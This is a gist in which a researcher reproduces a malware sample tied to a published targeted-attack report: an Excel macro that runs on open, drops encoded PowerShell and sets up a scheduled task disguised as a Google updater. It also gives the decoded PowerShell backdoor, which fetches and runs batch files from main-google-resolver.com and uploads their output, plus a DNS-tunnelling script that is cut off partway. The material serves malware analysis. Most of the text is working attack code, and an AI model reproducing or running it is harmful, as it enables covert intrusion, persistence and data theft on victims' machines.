
Revisions

  1. @invalid-email-address Anonymous created this gist Oct 23, 2016.
    437 changes: 437 additions & 0 deletions gistfile1.txt
    @@ -0,0 +1,437 @@
    //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
    //posted by @JohnLaTwC
    // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

    ----------------------------------------------- macro ----------------------------------

    Private Sub Workbook_Open()
    Call doom_Init
    Call doom_ShowHideSheets
    End Sub

    Sub doom_ShowHideSheets()
    If ActiveWorkbook.Worksheets(1).Visible Then
    Dim WS_Count As Integer
    Dim I As Integer
    WS_Count = ActiveWorkbook.Worksheets.Count
    For I = 1 To WS_Count
    ActiveWorkbook.Worksheets(I).Visible = True
    Next I
    ActiveWorkbook.Worksheets(1).Visible = False
    ActiveWorkbook.Worksheets(2).Activate
    End If
    End Sub

    Sub doom_Init()
    Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
    Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
    Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
    Set wss = CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
    If Not (fso.FolderExists(pth)) Then
    fso.CreateFolder (pth)
    End If
    cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
    cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
    If Not (fso.FileExists(pth & "backup.vbs")) Then
    If Not (fso.FolderExists(pth & "up")) Then
    fso.CreateFolder (pth & "up")
    End If
    If Not (fso.FolderExists(pth & "dn")) Then
    fso.CreateFolder (pth & "dn")
    End If
    If Not (fso.FolderExists(pth & "tp")) Then
    fso.CreateFolder (pth & "tp")
    End If
    wss.Run cmd, 0
    wss.Run cmd2, 0
    Set wss = Nothing
    Set fso = Nothing
    End If
    End Sub


    ----------------------------------------------- DnE.ps1 ----------------------------------
    powershell -EncodedCommand "JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwBtAGEAaQBuAC0AZwBvAG8AZwBsAGUALQByAGUAcwBvAGwAdgBlAHIALgBjAG8AbQAvAGkAbgBkAGUAeAAuAGEAcwBwAHgAPwBpAGQAPQAxADgANQA4ADgANAA3ADkAOAA3AFwAIgA7AA0ACgAkAFUAUAAgAD0AIAAiAHUAcABcACIAOwANAAoAJABEAE4AIAA9ACAAIgBkAG4AXAAiADsADQAKACQAVABQACAAPQAgACIAdABwAFwAIgA7AA0ACgAkAFUAUABMAEsAIAA9ACAAIgB1AHAAbABvAGMAawAiADsADQAKACQARABOAEwASwAgAD0AIAAiAGQAdwBuAGwAbwBjAGsAIgA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACAAJABwAGEAdABoACkADQAKAHsADQAKAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJACQAdwBjAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB0AHIAdQBlADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEwAYQBuAGcAdQBhAGcAZQAnACwAJwBlAG4ALQBVAFMALABlAG4AOwBxAD0AMAAuADUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ARQBuAGMAbwBkAGkAbgBnACcALAAnAGcAegBpAHAALAAgAGQAZQBmAGwAYQB0AGUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUAByAGEAZwBtAGEAJwAsACcAbgBvAC0AYwBhAGMAaABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBDAGEAYwBoAGUALQBDAG8AbgB0AHIAbwBsACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHIAIAA9ACAARwBlAHQALQBSAGEAbgBkAG8AbQA7AA0ACgAJACQAZgBpAGwAZQAgAD0AIAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAcgA7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAHcA
YwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAGkAbgBrACwAJABmAGkAbABlACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkAewANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdACAAPQAgACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADMAOwAgAFcAaQBuADYANAA7ACAAeAA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEA
dABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8A
ZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoA
CQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFUAcABUAGgAZQBtAEEAbABsAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAATABLACkAKQANAAoACQB7AA0ACgAJAAkATgBlAHcALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAHQAeQBwAGUAIABmAGkAbABlADsADQAKAAkACQBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAewB0AHIAeQB7AFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAIAAoACQAXwAuAEYAdQBsAGwATgBhAG0AZQApAH0AYwBhAHQAYwBoAHsAYwBvAG4AdABpAG4AdQBlAH0AfQA7AA0ACgAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABFAHgAZQBjAHUAdABlAA0ACgB7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAGIAYQB0AGYAaQBsAGUAIAA9ACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGIAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgA7AA0ACgAJAH0ADQAKAAkAJABhAHIAZwBzAD0AIgAvAGMAIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAgAD4AIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAuAHQAeAB0ACIAOwANAAoACQBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0ARgBpAGwAZQBQAGEAdABoACAAYwBtAGQAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABhAHIAZwBzADsADQAKAAkAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAYgBhAHQAZgBpAGwAZQArACcALgB0AHgAdAAnACkAOwANAAoACQBSAGUAbQBvAHYAZQAtAEkA
dABlAG0AIAAoACQAYgBhAHQAZgBpAGwAZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoADQAKAEEAbABpAHYAZQA7AA0ACgA="

    decodes to:

    $MYHOME = $Env:Public+"\Libraries\RecordedTV\";
    $SERVER = "http://main-google-resolver.com/index.aspx?id=1858847987\";
    $UP = "up\";
    $DN = "dn\";
    $TP = "tp\";
    $UPLK = "uplock";
    $DNLK = "dwnlock";



    function DownloadFile($link, $path)
    {
    $wc = new-object System.Net.WebClient;
    $wc.UseDefaultCredentials = $true;
    $wc.Headers.add('Accept','*/*');
    $wc.Headers.add('User-Agent','Microsoft BITS/7.7');
    $wc.Headers.add('Accept-Language','en-US,en;q=0.5');
    $wc.Headers.add('Accept-Encoding','gzip, deflate');
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Pragma','no-cache');
    $wc.Headers.add('Cache-Control','no-cache');
    $r = Get-Random;
    $file = ($path.TrimEnd('\'))+'\'+$r;
    try
    {
    $wc.DownloadFile($link,$file);
    }
    catch [System.Net.WebException]
    {
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Accept','*/*');
    $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko';
    try
    {
    $wc.DownloadFile($link,$file);
    }
    catch
    {
    throw [System.Net.WebException] $_.Exception.ToString();
    }
    }
    $cd = $wc.ResponseHeaders['Content-Disposition'];
    $filename = $cd.Substring($cd.IndexOf('filename=')+9);
    $filename = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($filename.Replace('-','/')));
    Set-Content -Path (($path.TrimEnd('\'))+'\'+$filename) -Value ([System.Convert]::FromBase64String((Get-Content -Path $file))) -Encoding Byte;
    Remove-Item $file -Force;
    return (($path.TrimEnd('\'))+'\'+$filename);
    }



    function DownThemAll
    {
    if(-not(Test-Path $MYHOME$DNLK))
    {
    New-Item $MYHOME$DNLK -type file;
    $i = 1;
    while($i -le 3)
    {
    try
    {
    DownloadFile ($SERVER+'d') ($MYHOME+$DN);
    }
    catch
    {
    break;
    }
    $i++;
    }
    Remove-Item $MYHOME$DNLK -Force;
    }
    }



    function UploadFileRemove($file)
    {
    if((Get-Item ($file)).length -gt 0)
    {
    $wc = new-object System.Net.WebClient;
    $wc.UseDefaultCredentials = $true;
    $wc.Headers.add('Accept','*/*');
    $wc.Headers.add('User-Agent','Microsoft BITS/7.7');
    $wc.Headers.add('Accept-Language','en-US,en;q=0.5');
    $wc.Headers.add('Accept-Encoding','gzip, deflate');
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Pragma','no-cache');
    $wc.Headers.add('Cache-Control','no-cache');
    [System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($file))) | Out-File $file -Encoding Default;
    $i=1;
    while($i -le 3)
    {
    try
    {
    $wc.UploadFile($SERVER+'u',$file);
    break;
    }
    catch [System.Net.WebException]
    {
    $i++;
    continue;
    }
    }

    if ($i -eq 4)
    {
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Accept','*/*');
    $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko';
    $i = 1;
    while($i -le 3)
    {
    try
    {
    $wc.UploadFile($SERVER+'u',$file);
    break;
    }
    catch [System.Net.WebException]
    {
    $i++;
    continue;
    }
    }
    }
    }
    waitfor uplproc /T 1;
    Remove-Item $file;
    }



    function UpThemAll
    {
    if(-not(Test-Path $MYHOME$UPLK))
    {
    New-Item $MYHOME$UPLK -type file;
    Get-ChildItem $MYHOME$UP | ForEach-Object{try{UploadFileRemove ($_.FullName)}catch{continue}};
    Remove-Item $MYHOME$UPLK -Force;
    }
    }



    function DownloadExecute
    {
    try
    {
    $batfile = DownloadFile ($SERVER+'b') ($MYHOME+$DN);
    }
    catch
    {
    return;
    }
    $args="/c "+$batfile+" > "+$batfile+".txt";
    Start-Process -WindowStyle Hidden -Wait -FilePath cmd -ArgumentList $args;
    UploadFileRemove($batfile+'.txt');
    Remove-Item ($batfile);
    }



    function InitCheck
    {
    if(-not(Test-Path $MYHOME$DN))
    {
    New-Item $MYHOME$DN -type directory;
    }
    if(-not(Test-Path $MYHOME$UP))
    {
    New-Item $MYHOME$UP -type directory;
    }
    if(-not(Test-Path $MYHOME$TP))
    {
    New-Item $MYHOME$TP -type directory;
    }
    }



    function Alive
    {
    InitCheck;
    DownThemAll;
    DownloadExecute;
    UpThemAll;
    }



    Alive;


    ----------------------------------------------- DnE.ps1 ----------------------------------
    powershell -EncodedCommand "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"

    decodes to:
    $global:myhost = '.main-google-resolver.com';
    $global:filename = '';
    $global:myflag = 0;
    $global:myid = '###';
    $global:myhome = "$env:Public\Libraries\RecordedTV\";
    function convertTo-Base36 ($decNum="")
    {
    $decNum %= 46656;
    $alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    do
    {
    $remainder = ($decNum % 36);
    $char = $alphabet.substring($remainder,1);
    $base36Num = "$char$base36Num";
    $decNum = ($decNum - $remainder) / 36;
    }
    while ($decNum -gt 0);
    $base36Num.PadLeft(3,'0');
    }
    function GetSub($myflag2, $cmdid='00', $partid='000')
    {
    if($myflag2 -eq 0)
    {
    ('zz000000'+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    elseif($myflag2 -eq 1)
    {
    ('zz'+$global:myid+'00000'+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    elseif($myflag2 -eq 2)
    {
    ('zz'+$global:myid+$cmdid+$partid+(convertTo-Base36(Get-Random -Maximum 46655)));
    }
    }
    function Str2Hex($mystr)
    {
    [System.BitConverter]::ToString([System.Text.Encoding]::Default.GetBytes($mystr)).Replace("-", "");
    }
    function Alive
    {
    if($global:myid -eq '#'+'##')
    {
    return 0;
    }
    SendReceiveDNS ((GetSub 1)+'30');
    $sub = ((GetSub 1)+'232A') + (Str2Hex $global:filename);
    $i = 1;
    $ret = 0;
    while($global:myflag -eq 1)
    {
    $ret = 1;
    $sub2 = $sub + (Str2Hex $i);
    SendReceiveDNS $sub2;
    $i++;
    }
    if($ret -eq 1)
    {
    FixBatFile ($global:myhome+'tp\'+$global:filename+".bat");
    }
    $ret;
    }
    function SendReceiveDNS ($d)
    {
    $cnt = 0;
    while ($cnt -lt 20)
    {
    try
    {
    $mydata = ([System.Net.DNS]::GetHostByName($d+$global:myhost).AddressList[0]);
    $mydata = ($mydata | ForEach-Object {$_.IPAddressToString});
    $cnt = 25;
    }
    catch
    {
    Start-Sleep -m 500;
    $cnt++;
    }
    }
    if(-not($cnt -eq 25))
    {
